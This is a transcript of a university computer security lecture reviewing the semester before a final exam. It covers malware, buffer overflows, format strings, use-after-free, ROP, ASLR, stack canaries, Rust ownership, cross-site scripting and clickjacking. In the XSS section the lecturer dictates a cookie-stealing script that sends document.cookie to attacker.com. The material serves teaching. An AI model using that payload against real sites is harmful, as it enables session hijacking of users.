Okay, good afternoon. So today we're going to do our final exam review. So if you don't have many questions, this will be very short. So general logistics. So as you hopefully know, there's a challenge assignment out, which is the take-home portion of the final, which is due before the final. And to be abundantly clear, late submissions will not be accepted unless you have arranged with me in advance, because I need to get your grades in on time. So I can't do the normal late policy here. Also, there will be a written part of the final exam in this room, 2 p.m. on May 11th, our normal scheduled final time. Since we have a take-home portion, it will be 90 minutes instead of the full three-hour block we have. Target length will be similar to midterms, maybe slightly longer because we have slightly more time. And most of the focus will be after things after the last midterm, but I will be sure to ask some questions from stuff earlier, and I will try to focus on things that aren't covered by the take-home problems. And because we have a whole semester of stuff that you may or may not want to ask questions about, might as well give a quick overview of things we covered this semester. So we basically had three parts to this class. So in our first part, we covered malware and anti-malware, this little cat and mouse game. Then we talked about vulnerabilities, especially memory error vulnerabilities, which are ways that malware could spread, or people could just exploit without malware, just personally, vulnerable computer systems, and various mitigations for this. In the third part, we had sort of miscellaneous topics, so we talked beyond mitigations about how to produce software that's correct in the first place, and some vulnerabilities and exploits that apply to software that isn't based on memory errors, things like injection vulnerabilities and logic errors that are particularly common in, say, web applications. And also a miscellaneous topic of privilege separation as sort of a more generic mitigation technique. So our first part, we had malware. And we talked about how malware tricks itself to get onto the victim machines. Various ways that you could spread, commonly embedding in other executables, and attacking vulnerabilities in software on machine to spread from machine to machine, like an email message with a Word document that affects the machine. And we talked about the cat and mouse game, where antivirus software used patterns and heuristics, just looking for specific code or looking for specific behavior to detect malware, and malware responded by trying to either appear like normal software or to disable those techniques or to hide patterns that might make them look suspicious. This sort of cat and mouse game where there's no clear winner, but it's at least a lot harder for malware authors than it was before. And memory vulnerabilities and exploits, our biggest exploit was some sort of buffer overflow and underflow. That we have something like an array, and the program writes outside the bounds of that array for some reason. The most simple case is contiguous, but it doesn't have to be. It could be some sort of, you choose an index into the array and the program writes there, even if that index is completely nonsensical. And the idea is that if there was important enough data that the program could end up writing to, like a return address or a function pointer, that the attacker could gain full control of the program. So the usual goal was to overwrite some important code, but there were also other cases, like we saw with the format string vulnerability, where our array was effectively the array of arguments, that usually, in our example, we wrote to a data pointer, not to code, but could have also written to a code pointer. And we also looked at use after free, which is another sort of, it's like an overflow in that we're writing to memory we're not, or reading from memory we're not supposed to, but the cause was not that we didn't do a bounds check, the cause that was that we had sort of time error, that something was valid before, but it's no longer valid now, and the program didn't track that correctly. So instead of not tracking array indices, it didn't track the duration during which something was valid correctly. And in addition to talking about these various exploits, we talked about several families of mitigations. So we had the most straightforward thing, which was bounds checking. And we found that bounds checking was a thing you could add to something like C, but it wasn't cheap. Though certainly it is something other languages like Java do. And it doesn't solve all our problems. It didn't deal with use after free. And you know, some of our bounds checking solutions that were reasonably easy to implement don't deal with something like an object which contains both an array and pointers. You could imagine solutions which deal with that, but that's harder to deal with. You need even more information to track. We talked about stack canaries, which were the response to one particular kind of vulnerability, and a technique we could use for others, where we know what the target data pointer is, and we assume the attacker can't skip around. So we detect writes next to a vulnerable thing, in this case the return address. We could apply the same technique for other vulnerable pointers in our program. And before we use that pointer, we look to see, was this return address thing, the thing next to this return address, was it written? If so, that probably means something bad happened. So these were mitigations which sort of directly try to affect the can you write to bad places. Then we have a mitigation ASLR, which tries to affect sort of can you write to bad places if you have to put in the address, which sometimes is a problem. And can you make up useful pointers, because typically you're overwriting a pointer. And ASLR tries to make it so you can't guess what pointers are. And both ASLR and stack canaries have problems that they're kind of assuming we keep information secret from the attacker, and if our program has memory errors where we access arrays out of bounds, we might not do that. And we also had writex or execute, where we make it so the attacker can't insert new code, because typically what the attacker would do to do whatever they wanted, the simplest thing to do was to write code and put it in the input so you could execute it later. WriteX or execute made it so the attacker couldn't do that. The problem is that the attacker could reuse existing code, and non-obviously, this because of return-oriented programming meant that the attacker could do pretty much anything they wanted in any realistic executable. And in addition to these sort of generic mitigations for memory errors, we also looked at some ways of finding bugs and preventing bugs. So for finding bugs, sort of the obvious strategy is systematic testing. And systematic testing is in some senses easier than normal testing here, because we just want to test if it crashes. Because usually something which results in a memory error that's exploitable will also result in a crash under similar circumstances where the exploit isn't quite right. And so a common technique, and one you did for homework, use a tool to do this, is fuzz testing, where you generate random tests, possibly biased random tests. So our tool did coverage-guided fuzz testing, so it looked at what code actually got run to avoid testing uninteresting things in the program. So it tried to find different pieces of code that ended up running and make variations to run more and more code to get good coverage, to get lots of code to run. And because of that, it's pretty quick, you know, only several million executions to find a bug or two in a vulnerable piece of software. We also mentioned a more systematic technique of symbolic execution, which we didn't have you do with the tool because these tools are not particularly fast. But this is the most direct approach, that yes, you can in fact write software which looks at a program and says, how do I write test cases directly, and just solves equations. The problem is that that's not, you can't reliably solve for how do I get to this piece of code. That's not actually always a tractable problem, but it works often enough that it's an interesting technique. And we also talked about static analysis, which was looking for dangerous patterns. So rather than actually constructing concrete tests, we just look at the code and say, systematically, and say, is there some path that might do something dangerous like a use after free? Is there a way of running a free and then using that value that looks like a valid path through the program? And when we do this, we usually aren't as precise. So many of these tools have false positives and false negatives. So they might give you a path that's not actually reachable because they don't check all the conditions on the path. But because they're not checking all the conditions on the path, they can actually run on programs there, it's hard to figure out what's going on. They might give you false negatives because they prune away paths that seem unimportant based on assuming that this condition is complicated and unlikely to be true in order to keep the amount of output they give tractable. And we also mentioned sort of bug prevention. The big thing we talked about is sort of the disciplines you can have to enforce pointer safety. So the ones for array bounds are pretty obvious. You just always check array bounds. And maybe you get rid of those checks if you're very carefully making sure that like you're getting the values from things which are in bounds. But for use after free, this is where it was tricky. And we mentioned what Rust's policy for this was, which is something you could do in other languages, where you enforce this idea of ownership, that someone owns the pointer, the value that's pointed to, and they don't delete the value until they're done. And other people can use the value only if they borrow it from an owner, or get it permanently from an owner. And this ensures that we never free the value before everyone's done with it. And we also have to have this rule because we have internal pointers, which could change and give us a dangling pointer, that we only allow one writer at a time or multiple readers. So this is a policy which works most of the time, not all the time. And this is what Rust implemented in the compiler, to enforced in the compiler, to make it easier to follow these disciplines. But it doesn't always work, so there's alternate policies where you can easily guarantee safety without doing something like what Java does, where there's a magical garbage collector, which people don't like because it's sometimes slow or hard to understand the performance of. So like reference counting was an example. And finally, we talked about sort of command injection and web security. So command injection was this sort of very high-level security bug, one that's very common not in languages like C, but in languages like PHP or Python, where you commonly talk to some other piece of software in some language, like shell or SQL or HTML, and you have some way of confusing things which should be commands and shouldn't be commands. And this means the attacker can give you something which is supposed to be, for example, a constant, and it becomes a command, because you didn't handle embedding it in the language correctly. Usually you wanted to quote it, or you wanted to filter out bad characters, and you didn't do that. So we all talked about command injection in the context of the web. We also talked about other problems with web security. Namely that web browsers work with multiple websites and they let websites talk to each other. And if you don't think of this when you're making your website, you can have problems where you assume something came to you because the user did it, but maybe they didn't. Or you assume that other websites can't figure out what you're doing, but there's some things that web browsers allow and some things they don't, based on what they call the same origin policy, about what they allow scripts and web pages to actually do to other web pages. Okay, so that's my very brief tour of the topics we had this semester, which hopefully has refreshed your memory or bored you. So with that, I will collect questions. I assume you have questions, things you'd like me to go over. Yeah. Okay, pointer subterfuge, okay. Other questions? Yeah.
Ownership.
Ownership, okay. All right, so this is... Other questions? Yeah.
Can you go over the cross-site scripting again?
Okay. Okay. Other topics, questions? People will think of them later. Okay. So I will do this in this order then. Okay, so cross-site scripting, and I believe I have a slide for this. And this one. So, yeah, we'll get to that. So cross-site scripting. So what is cross-site scripting, first of all? So the usual attack scenario for cross-site scripting is that we have a victim website and a victim user who's a legitimate user on that website. And the victim user, for some reason, happens to visit the attacker's website. For example, maybe they get a link to it in their email, maybe it's served as part of an advertisement on some other website they're visiting. Lots of ways that could happen. But for some reason, in their web browser, they visit the attacker's website. And the attacker's website includes a command to get something on the victim website. This is the most common cross-site scripting scenario. And it's a request that the attacker chooses. So the attacker can make a request that maybe includes something which will result in HTML they choose being embedded in the website because we didn't do escaping properly. So the request, for example, says, here's a form, show me this form and pre-fill out the name to contain end quote, end bracket script or something like that. And maybe some code to inject a command in there because HTML can contain JavaScript, which is a late programming language which contains commands to do things. And one of those commands can be send the cookie for the current web page somewhere. And we saw a way of writing that was by requesting an image, because that's something we are allowed to do. So we could send something like name equals name equals end tag, end the tag and script and new image, which is located at equals attacker.com plus document.cookie, where plus is the actual concatenation operator in JavaScript. So this is our typical, one form of cross-site scripting attack, is that the attacker tells the victim browser to go to this website, and the victim.com serves back a page which contains, because of this, a JavaScript tag. They meant to have something like input name equals name value equals and something like this, where things are escaped properly, but they don't. So we get something like this, and now we have a valid script tag. And this is victim.com's bug. So, question here?
So, for cross-site scripting, it has to be an exploit. Like, this is like exploiting a bug within a website. It's not like automatically something that a
Yeah, so this is, so the bug here is in victim.com. So victim.com is the thing which is buggy here. So in our attack scenario, it's our, we're using the victim web browser, but the victim web browser is doing what we say HTML and JavaScript are supposed to do. Because remember, there's scenarios where we expect websites to communicate with each other. Like you click the login with Facebook button, and it does something legitimately that's kind of similar to this. Or you click a, so we expect this, so this sort of thing, the web browser is working as intended. There are things the web browser could do to stop this, but it doesn't actually know what the victim website and the attacker website, expect to do with each other, whether they are trying to cooperate or not. So ultimately, this is something that that victim.com in this case needs to fix, not the web browser. Yeah. Yeah, so this is a kind of command injection. So there's multiple ways. The simplest sort of most generically applicable scenario is that for some reason you visit the attacker's website and they tell your browser to load this other web page, they happen to use their funny URL here that they're going, that we're going to, this funny URL here which contains all the scripts, which makes the web page you go to contain this JavaScript that they chose. So they're choosing what's on victim.com is the bug. That victim.com's not supposed to let them choose what script, what commands are in their web page. So, yeah, so the question is, how does the attacker end up requesting the attacker website? So one way is the attacker could just trick the victim into doing that, to send a link in an email or something like that. Or they could buy an advertisement which embeds their web page. That would be a valid way of doing this. Yeah. So this is the most common, so this is the simplest scenario. Looking at, which is this, so this is, I guess, reflected XSS, which is the main scenario I talked about. I also briefly mentioned stored XSS, where you tell victim website, my comment is script ... and victim site displays your comment to other users. So that's another way this can happen. This is a bit less common because there's less websites which have user-generated content. But when you do, a way you can happen is if you write a comment and it gets displayed to every user who visits that page. Therefore, that script is there for everyone who visits victim.com, and you don't need to trick someone into loading something from your website. Yeah. Yeah, so it's where they embed the other, where the victim webpage echoes back the cross-site scripting, so they need to make you visit a particular special URL. The stored case, they don't need to do that because they're just putting something that's on, adding something to the victim website using a legitimate interface, like adding a comment to a blog post or something like that. Yeah. The question is when the attacker would set this up?
Yes, when would the attacker?
So the attack scenario is for reflected XSS, the attacker discovers this bug in victim.com. After they discover it, they make attacker.com and they put this link in attacker.com with the script code that they've written. So that's the setup. In the stored case, they discover this bug and they just insert their script code in a place on the website which we visited as much as possible. Okay. Other questions about this, or do I move on? Yeah.
So with the reflected cross-site scripting, does the attacker website have to be open at the same time as victim website?
So the question is, does the attacker website need to be open at the same time as the victim website? So it depends what you're doing with the attack. But the key thing here is that we want to get document.cookie or use cookies browsers will send. So the question is user logged in? So they don't need to have the website open, but they need to be logged in. So if they go to the website, they're logged in because their cookie is being sent. So that's our key attribute that we're taking. Attacker wants to hijack the user's login, the victim's login on the website. That's typically what they're doing with this attack. So if logging into the website is something that's usually not done, or you have to re-enter your password, and maybe you know, not so they can't do as much. But if you're just persistently logged in, it doesn't matter if you visited it recently, as long as you're, if you went to it, you would be logged in. Because they're going to making your browser go to it, even if you can't see it. Okay, other questions? Okay, so next question is about pointer subterfuge. What do you do with pointer subterfuge? I'm guessing I don't have slides for this. So the scenario for pointer subterfuge is that we have a vulnerable function where we have something like a long star pointer, where there might be an actual reason for this pointer, and we have some value perhaps, and we have some buffer. And at some point, we overflow this buffer. And then at some point later, the program sets pointer to value. So it might not be so simple. Pointer or value might be further apart, but all that matters is what is that the memory layout lets us overflow the buffer and overwrite pointer and value somehow. So if our memory layout looks like return address and stack canary, let's say, and let's say pointer and value and buffer. So if this is our layout, where then we can when we overwrite the buffer, we can overwrite value and pointer, and we don't even touch the stack canary. So then we get to write to an arbitrary location in memory. So in some cases, that's going to be enough. So like in our format string assignment, that's all we cared about doing. I think everyone used that solution. They didn't try to do anything fancy. They just overwrote some global variable, which they knew setting to the appropriate value, like A, did something useful to them. So that's one thing you can do with pointer subterfuge like this. You can do that same thing where if you know there's some variable with an important value, you don't need to run your own code. You can just change that variable's value as long as it's in memory and you can figure out its memory location. And we also had, so we have possible for pointer. So important variable, e.g. grade. So grade, you know, you can just change the grade directly. You don't need to run any code. Otherwise, a value for a variable is going to probably be something that lets us change what code gets run. So an example would be some pointer to code or function. So e.g. the return address. So we could make pointer point, maybe I should be drawing this. Point to the return address. And we can skip right over the stack canary, who cares about it. We need to figure out the memory address of the return address, but that might be doable. And we can overwrite that to point to somewhere useful to us. Yeah. So in this case, with a straightforward overflow, we're likely to only be able to change value and pointer together. And we want to control, changing the value lets us control what thing gets written to using that pointer. So we're going to want to change both, because usually it's going to be more useful if we can control what value gets written. Like if we're overriding a grade, we want to choose the grade. If we're overriding the return address, we want to make it point not to some random location we don't get to decide, but to code that does what we want. Yeah, that's part of the vulnerable code. So all this up here, this is our vulnerable code. So we can have return address is one possibility. So we need, you could have a global offset table pointer. So for dynamic function is one possibility. We could have pointer to vtable pointer, which is used to find method pointers for polymorphism. We have a bunch of options, e.g. actual pointer and code. So we have a bunch of options. If we just find the address of some important thing to overwrite, we can overwrite it. And so which option you use depends on the program, what's going to be convenient. But because we have these sorts of pointers to code, typically we can use this type of vulnerability to end up doing anything. This is especially true because we might be able to do this multiple times. So even if we can't do it by overwriting one thing, we can overwrite multiple things. So we could like make an ROP chain somewhere, even if we can't do that directly. Okay, other questions on this pointer subterfuge, this example? So the other topic I had listed down, object ownership. So object ownership. So what was our concept of ownership? So this is a programming discipline to prevent dangling pointers, which are dangling pointers, you know, are what causes useActor free. So our rule is we never ever want to have a pointer that we'll ever try to use unless it's actually going to be allocated, not freed. So we had this sort of buildup. So the simplest thing we can do, super simple policy, is never take pointer, never give anyone pointers. That prevents dangling pointers. You never make pointers, you'll never have any. But that's not useful. So we have this slightly less simple rule, which is ownership, which is there is only one pointer. There's only one pointer, and if you want to give someone else a pointer, that means you get rid of yours. And this means that you'll never want to get rid of the object because you're the only person using it. So you'll never want to get rid of it while someone else might be using it because only one person is using it. Either you're using it or you've given it all away to someone else. So this is the most basic version of ownership. Problem is that this is not powerful enough to do many things you'd actually want to do. Because typically you'd like to call a function and give it some value you're working on and be able to conveniently have it use that. This is the sort of basic concept. So borrowing is this pattern we have with basic ownership, where we say where we have a value x, and we say we call function giving away x, and we take x back from the function when it returns. So this is this borrowing pattern, which we can do with simple ownership, where we give away the value while we call the function, and we get it back when it returns. So this is this notion of borrowing. So borrowing still maintains this property that we only have there's only one pointer effectively. We may have a copy of the pointer, but because we know we're getting the thing back from the function, we know it's safe to keep that around. You know, that the pointer's somehow going away, the function's not returning to us. So borrowing is the basic concept that Rust implements as sort of a language feature, which is basically just a convenient way of doing this. So Rust pass reference compiler make sure it's equivalent to the buff. And the basic and the way it does this is it tracks lifetimes. Lifetimes, how long are you are you keeping an object around, keeping the object. So it tracks lifetime, so it lets you take another pointer, but it tracks how long that pointer's around. And during lifetime, you've given it away. You can't use it, do things with it. What things depend. So that's the simple version. So this is the first iteration of borrowing, is that where we, when we give it away, we've given it away, we can't do it, deal with it, and we track how long we're giving it away. The compiler does this with this idea of lifetimes, that it knows how long this pointer might be around, and while that pointer's around, it assumes that we can't use our own pointer because we've given it away to that pointer. So this isn't as useful as you'd like, because we'd like to have multiple pointers with which we can read a value. So there's this relaxation for reading, which is the allow borrowing multiple times for read rule. No one writes contain pointers. But then we have this rule that no one writes, and this is because our objects will contain pointers. We don't want to change those pointers, and therefore, like, take a copy of a pointer, that pointer gets reallocated, like we expand a vector. We don't want to allow that. So our rule is that if we borrowing for someone, people are borrowing our object for reading it, we're not going to modify it so they don't get confused about memory that's in that object that gets reallocated in some way. And we allow borrowing just one time, exactly once for write, which is the same rule as before. So this is a discipline. So this is a discipline that prevents use after free. And really, if I wanted to show this, I probably like should have a proof. And we need to talk about how you prove these things, which is not a topic of this class and probably not worth our time. But you know, that's what you want to do. But the idea is that this is a programming discipline that Rust implements as a sort of language feature, but you could do in other languages. So you could implement like a C++ library that tracks these sorts of things and makes you follow this discipline, or just follow it by hand and check manually, and you would not have use after free bugs. And something like this is something you might commonly do in like a large C++ project. Is you'll say, this guy owns this pointer, we've given it away, we shouldn't free it now. And you'll do this by hand or some way. This is just formalizing that and making it something that the compiler will check. That's what Rust does. Yeah. Yeah.
So like a global one could be linked to the whole main function, and then other ones are linked.
Yeah, so the lifetime is basically how long is this pointer possibly around. So if you have a pointer defined in some scope, it's the length of that scope, essentially. And if you're making a function call passing a pointer, it's the length of that function call. So, that was borrowing. So this is one of, and and there are other disciplines also work. Okay, so there are other disciplines you can use, and they also work, and it's probably not the case that you'd always want to use this borrowing idea, because it makes some things inconvenient to program. And one example we had was sort of if you want to do sort of callbacks, like listening for changes to something, that's not very convenient in this pattern, because that callback calls you, how does it get ownership of the thing it's passing information to? That's not trivial to do. So maybe that's something where you'd want some other discipline, which like reference counting, which might be a little trickier to implement. But there's these policies we can implement, follow as programmers, that prevent use after free. But they might prevent us from writing some programs we want to write. OK. Okay, so that's all the topics I had listed. So have people thought of other things or questions? Yeah. Okay.
Is there any way that you
can like maybe like rank the different taxes and like how good they are and mitigation? You know, like we talked about like ROP, for example, like really good versus like some other taxes. Okay. So tax and mitigations. Other top questions people thought of before that? Okay. So attacks and mitigations. So ranking is probably the wrong thing, but we can talk about sort of particular, what sort of requirements that attacks have and what mitigations can do about requirements. So let's start from mitigation. So we have, one mitigation we have is ASLR, and this is about the requirement that need memory addresses. So ASLR breaks attacks that need a memory address. They need the address of something. Unless there's an information leak to tell them an address. So we can look at what attacks need a memory address. So who can think of attacks where we needed a memory address? Yeah. Okay, what's an information leak? So, get that as a separate topic. So information leak is vulnerability be exploited, print out secret information. So one example is a stack canary output being output. So maybe when we have an array out of bounds, we don't get to write to that array, but maybe you can print out what's there, and we can learn what the stack canary is, which we're never supposed to know as an attacker. Another example is pointer values, like address of the stack. And one way this could happen, for example, is e.g. if we print out an uninitialized memory under some circumstances. That memory might have used to have contained pointers. Like we allocate something on the stack, we print out what's there without zeroing it out. That's not going to let us do like write code or run code, but it might tell us some pointers. Like it's very likely to tell us some pointers because it's very likely some pointer was written to the stack earlier. And that would be an example of information leak. So this ASLR said breaks attacks that need memory addresses. So what were some attacks that needed memory addresses we talked about? Were you implemented? Yeah. What, the jump? Tricky. So the tricky assignment, that was modifying an executable. So yes, it needed addresses. But unfortunately, they're always in the executable, and ASLR might seem to get rid of them, so we need to do something different for tricky jump. But ASLR is not primarily targeted at dealing with viruses because they can do things like insert code at fixed memory addresses by modifying the executable header. So it doesn't really work there just because they can get rid of it. Yeah, so overriding the return address, so stack smashing need a substitute for return address, which must be a memory address. So that was an attack where we needed a memory address. Anyone think of anything else we did where we needed a memory address for an attack? Pointer subterfuge, yeah. So pointer subterfuge, we need a memory address to place a memory address over pointer value. So we need a memory address there, yeah. The format string. Yeah, so format string exploits, we needed to have a memory address. So either we needed to place a memory address or have it already be on the stack. to do that, because the attack was that we could do a write to an arbitrary memory address, but we needed to choose a memory address that was useful. So it either needs to already be on the stack, or we need to place it there. And typically, we would place it there. We would not be lucky enough that it was already on the stack. Maybe sometimes we would. Any others we did with that? Yeah.
I have a question. Just related to this. Are there any that we did that did not require memory addresses?
So the question is, are there any we did which didn't require memory addresses? And the answer is no.
Okay.
So, which incidentally means return-oriented programming, we needed memory addresses of all the gadgets. Yeah. Tricky jump, we used memory addresses to figure out what to do, but since we were modifying an executable, like we could have added to the executable to make the memory addresses no longer be randomized that we cared about. So, yeah, we could have done that. We could have, or we could have done the calculations to figure out the memory address, because we end up getting code run with like the stack pointer and all those things. We could have gotten all the information we wanted at runtime and written different code. Okay, so one of these, while it needs a memory address, has a much easier time finding some memory addresses. Yeah. So then there's this question of degrees of ASLR. So we had non-position independent code. So this is the incomplete ASLR. Here, heap and stack and libraries were randomized, but executable code was not. So in this case, ROP didn't care. So ROP could work here. Then we had position independent code, which is sort of full ASLR, what you're supposed to do. And here ROP could not work without information link. Here. So we have sort of the incomplete version of ASLR, which is what you can do for free. So the advantage of this is no recompiling executable. Here, recompile executable. Okay. So one of these exploits sort of comes with an information leak for free. Most likely. Yeah, but time. But this, yeah, so a format string usually implies an information leak because we can print out everything on the stack. So as long as we can see what's print out in the format string, which you can't always do in the real world, sometimes it's printed out to somewhere you can't read. But as long as you can see what's printed out by it, it's like an information leak. So maybe it's a little less relevant there. So the ASLR was one big category. And ASLR pretty much is a problem for all the sort of memory attacks we talked about, except ones where you're lucky enough to not have a pointer. So we had some cases where that didn't happen. So upgrade, e.g. score is after buffer on the stack, for example. Like in that case, score for our quiz is after our name buffer on the stack. We overwrite the name buffer, we overwrite the score. We don't need to know any memory addresses for that. But usually those situations that where we don't need memory addresses are pretty sort of application specific special cases. Maybe not always. Though the key actual practical vulnerability is this information leak issue. That a lot of the times, if you have a buffer overflow, you also have an information leak, just because all the sorts of bad programming practices where you don't check array bounds mean when writing mean you might also do that when reading, means you might print out a value based on that, which means people can figure out what memory addresses are. Yeah. So what the disadvantage? So the big disadvantages of disadvantage of ASLR, so the biggest one is not binary, requires recompiling for full ASLR. That's the biggest disadvantage. Possibly slower code when compiled with it with full ASLR. And it's possibly slower code because we can't hard code memory addresses. We might have to compute them. That might be slower. On 32-bit x86, it's significantly slower, like 5 to 10%. On 64-bit, it's not very much of a penalty because 64-bit has instructions which are relative to the current location, which 32-bit x86 mostly doesn't. But that's the disadvantages. So recompiling, possibly slower code. There's some like more arguable disadvantages, like it means that you're program behaves inconsistently. It has memory bugs, which is annoying, just for debugging, right? With ASLR, your addresses are random. If you have a bug which depends on how addresses are related to each other, it's going to manifest differently every time. Whereas without it, it's at least going to be consistent how the bug appears, which might be easier to debug. It wastes virtual address space is another thing. So it wastes addresses. So this is a problem on 32-bit. So we can't, if you want to have lots of variation where like the stack is located, you need to have a lot of blank space where you don't put the stack that you may or may not use. And on 32-bit, that's going to be probably a significant portion of your possible addresses. On 64-bit, we have so many addresses, it doesn't matter, most likely, but on 32-bit, this is actually a problem. Yeah?
So if there's an information leak, even with the full ASLR, can attackers find a way to get around it?
Yes, so if there's an information leak, can attackers find a way to get around it? Absolutely. And this is, practically speaking, how most modern memory exploits work. So like we talked about the example of a use after free bug in Chrome. They had an information leak via the use after free bug. And that was what let them make an ROP chain that actually worked. So they figured out where the location of the binary was, used that to write an ROP chain, to like relocate an ROP chain so all the pointers pointed at the correct place, and to actually run that. Yeah. Yeah, so the question is, with information leaks, we need information leaks for every region of the program, because typically ASLR will locate the stack randomly, separately from the heap, separately from the libraries, and so on. So you would need one for each part, but it happens that probably any one part is enough. Like, you can, like, for example, the executable part of a program has the code you want to run for return-oriented programming, and also has a segment for global variables. And those are typically together so that we don't have to compute what the address of our global variables is in our code, because that would make our code slower, which means that now you have a place you can write data you need and a place you can find the code you need to run. It's a little harder if you only learn about the stack address, perhaps, but that's often not what you're, but often just any one will be enough, because you have some code you can write, and code you can run, and data you can write, and that's usually all you need. Okay, so that's ASLR. So ASLR was about attacking because attacks need memory addresses. So this affected pretty much all the memory error exploits we talked about. Did absolutely nothing about like command injection and different kinds of bugs. And didn't do anything when we were lucky enough that we had adjacent objects that were interesting with no pointers. So the other big mitigation we talked about was write X or execute. And this affected the assumption that attack needs to write code. And this was, so This was sort of less about what kind of attack it was and more about what it does once it is able to overwrite a pointer to code. So lots of attacks overwrite or some pointers to code. Because it's often the most convenient thing to do. This means attacker can't just point to writable buffer. So they can't just point to the writable buffer from that. So this basically adds extra step, figure out, do return-oriented programming, make a heat chain step. So this adds an extra step for the attacker of making an ROP chain, figuring out the addresses they need to do that practically to all the other attacks. So it doesn't disable classes of attacks by themselves, because the same principles that let you overwrite an address where code gets run will let you construct an ROP chain. But it might be substantially harder to do so, because you need to know the address of all the gadgets, including as adjusted by SLR, and you need to figure out how to find the starting gadget when you might not have the stack pointer set to a convenient location yet. I guess I should say ROP or jump-oriented programming chain. So were there other big mitigations? Yes. So stack canaries. So what did stack canaries prevent? What did stack canaries prevent? Overwriting return address, assuming you have to overwrite before it. Yeah, when it stops you from jumping over it, when it stops you from overwriting it with an underflow, going backwards. So this stopped a very particular attack, but it was a very efficient technique, which is why we talked about it. And the same principle you could do for other attacks. See, and we talked about baggy bounds. So what did baggy bounds checking do? Stop. So this was array bounds. So this was just bounds. This is prevented anything that overflow that involved bad pointer array accesses, which is so stack smashing, pointer subterfuge, and sort of heap smashing, and all those sorts of things. Anything that involved bad array accesses, start assuming not within the same object. So like if you have this, that baggy bounds checking doesn't help you, you need to do something more sophisticated. Because this is one object, and it's baggy bounds checking, you're gonna say, are these in this, is your thing you're accessing in buffer in the same object? Yes, it is, we're fine. So baggy bounds checking was a very different area of attack. I guess we should say, so SLR, prevents that. Another thing, so I should say use after free for SLR. So it also doesn't stop use after free at all. Use after free, yeah. It doesn't stop use after free because it's checking if you're doing bad, pointer arithmetic. But with use after free, you have a legitimate object that happens to have two legitimate objects which happen to be confused about the type they are, but you can still write to one object of one type and have it be read as a different type, because that's still going to be valid accesses. It's not going to stop that. Were there any other mitigations people want about? Okay, or other questions?
Yeah. Just a general question on the exam format. The web security question is going to be similar to the mitigation questions on the first exam?
This is undecided.
JavaScript, what like a good opportunity to use that attack looks like? Like, what's the key?
I'm not sure I can be exhaustive. So what is what is an example of vulnerable code for each one?
Right, yeah.
Okay. So patterns. So let's start with, so what's the simplest example? Probably. Buffer overflow. So buffer overflow, vulnerable code is something like something like this, where we don't just forgot to check that I is in bounds. That's typically what happens. And there's other ways of doing this. You can have memcopy, buffer, other buffer, length, too big. You could have something like this. You can have the integer overflow case. Where you don't realize that this might overflow. So attacker input might be like some negative number, like OX, which times 4 is going to be like 12 times. So some big negative number would be one example. Times 4, that's going to be, we're going to cut off, that will be end up being that, because we truncate after we multiply, and we end up cutting off. So this is sort of buffer overflow. So there's various ways it can look, but generally the pattern is we're accessing a buffer where either we didn't check the index or we didn't check it correctly. So there's some case where there's some overflow that might happen we don't notice, or where we made it sure the length was smaller than the wrong thing, or we didn't check it was negative, something like that. So another easy case is format string exploits, which is where you see printf input sprintf anything like this will do that. There's often in real code sometimes it involves some other format string taking function, but pattern is pretty straightforward. Yeah.
So that would, we would see one of those examples specifically where it's like reading in something from the command line or from the file and copying it to a local variable, and then based on where that variable is stored on the stack, that's where we overwrite to the return address or whatever we're trying to get that's below it.
Yeah, so buffer overflow, based on whatever's around the buffer. So if the variable's on the stack, it's whatever's around it on the stack. If it's on the heap, we care about what's around it on the heap. But whatever's around it, presumably, hopefully there's something important there. And So on the stack, usually the obvious target is a return address, but there might be something else. On the heap, usually the obvious target is going to be some data structure used by the memory allocator or an adjacent object which like has a vtable pointer or something like that. And if it's a global variable, the obvious target's going to be some other global variable that's hopefully like a pointer. All right, I probably should just write that down. So stack, this target is return address. Heap, this target is malloc data structures. Adjacent objects, e.g. vtable pointers. So something like vtable pointers and adjacent objects, globals is adjacent with pointers. So pretty much no matter where it is, we have something, we can find this nearby. Which thing that is going to depend on the type of object. Format string exploit. So use after free. This is the pattern is, that we say. So value the more realistic pattern usually looks something like this, where we stash a copy of the pointer with something else, then delete our own copy when the something else is still valid and still might have that pointer. And that this is pretty subtle is why these vulnerabilities are hard to fix. Yeah.
So like relating them back to the ownership thing, if you have borrowing enabled, then it would cause that it had been deleted.
So if you had borrowing enabled, our compiler would say, wait a moment. It will say you can't change value now because you've given it away to something else, which still needs a copy of it. So it'll prevent that delete or require you to get rid of other thing somehow. In Rust, this would be a compile error. Because to give the T to other thing, you have to let it borrow either on read-only or writable. If you borrowed it writable, you can't, and no one else can use it. If it borrowed it readable, you can't modify it. You can't let other things modify it. Yeah. So if you got the value back, would it make you delete other thing? No, because if you got the value back, that means other thing doesn't have a copy of it anymore. So it doesn't matter if you delete the value. So getting the value back from borrowing means other thing is done with it. So Rust would enforce that it actually doesn't have a copy of the pointer, so it's safe for you to get rid of it. And are there other, command injection. Probably should talk about that one. So our general pattern is, something like, what can we say? Something like that. not sure how familiar people are with calling processes in Python. Vh.query I guess I'll do the PHP thing. Something like that. Any cases I'm missing? We should talk about. Okay, iframe problems. So one thing is iframes are embed website in another website. So legitimate uses examples are advertisement in a web page, are YouTube player in other website. So that's example of sort of examples of real iframes that are pretty useful. And so problems with them are they are sneaky way of requesting URLs from other websites. Websites on same website can read other websites, read other pages, potentially legitimate, which has legitimate uses. Like if you want, this is a way of implementing interactivity, not the one you do today, but it's legitimate functionality. But this is sort of the, so they don't have to be visible. So in particular, they can be completely invisible. Or they can be, can be styled like text, arbitrarily small. Small, transparent, located at bottom of page, etc. Okay, so this is they're useful for reflected XSS because they don't have to be visible. So that means that if the attacker wants your web browser to visit another website, they don't need to make you obviously go to that website. They can just embed it, and you won't be able to see it. Yeah. So clickjacking is, provide something for a user to click, but place embedded iframe, other website embedded, on top of that location. The easy way is transparent and on top. The slightly harder way is, you either make it blend in, make a little, make one character visible and happen to be look styled the same as your link. Or, harder way, so blend in, make link. Or hard way is change page layout just before click. So if you can't actually do the transparent thing, you have these alternatives you could do. Yeah. So yeah, what examples? So I've heard, haven't confirmed this, that using for getting Facebook likes. So you want people to click that like button while they're logged into Facebook? Well, just have another link which happens to click it. And more nefarious examples are like if you know you could have load the delete your account screen, line up the delete my account button, and put it at the appropriate location. You can potentially do even if this is multiple clicks, because you load the delete my account button and then you load the next page aligned properly for the yes button. Yeah.
I know the JavaScript clip doesn't let you actually click in an iframe. Like, could you move the mouse right above the iframe?
